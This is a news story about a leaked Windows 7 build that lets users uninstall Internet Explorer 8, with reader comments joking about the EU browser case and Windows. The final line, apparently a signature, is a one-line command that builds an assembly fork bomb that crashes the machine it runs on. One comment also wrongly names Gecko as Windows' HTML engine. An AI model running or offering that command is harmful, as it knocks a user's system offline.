Windows 7 Lets You Uninstall IE8
CWmike writes "A just-leaked build of Windows 7 lets users remove Internet Explorer, the first time that Microsoft has offered the option since it integrated the browser with Windows in 1997, two bloggers reported today. The move might have been prompted by recent charges by the European Union that Microsoft has stifled browser competition by bundling IE with its operating system, the bloggers speculated. One solution under consideration by the EU would require Microsoft to disable IE if the user decided to install a different browser, such as Mozilla's Firefox or Google's Chrome. Microsoft had no comment when asked to confirm whether Windows 7 will let users dump IE8 or whether the option was in reaction to the EU charges."
A compelling feature to drag people away from XP.
Now only if it included a utility to uninstall Windows...
Help stamp out iliturcy.
Man who remove Internet Explorer but not Windows is a little like Lance Armstrong: still one Ballmer remaining.
Fascism trolls keeping me up every night. When I starts a preachin', he HITS ME WITH HIS REICH!
Have you ever actually managed to truly "uninstall" something on Windows?
Don't say yes, you'll be lying.
The problem is that even if you did that, certain programs would still launch IE (Autodesk's feedback utitlity for software crashes for example) instead of the default system browseer.
IE != Gecko. Gecko is used to render help files and other system-wide things that need an HTML rendering engine (same think as WebKit on OSX), but that does not mean that the IE application needs to be present to do so.
I'm out of my mind right now, but feel free to leave a message.....
> ... 6 apps that I have that will break, off the top of my head.
You may want to move your head out of the way - you're liable to get a concussion.
Cool! I think I'll try for myse
They've also stifled text editor innovation by bundling notepad.exe. They haven't even had the good graces to update it since the NT version. A classic example of MS sitting on its laurels.
Tag: andnothingofvaluewaslost
Do not meddle in the affairs of geeks for they are subtle and quick to anger
Apaches are kick ass Indians or equally kick ass combat helicopters.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;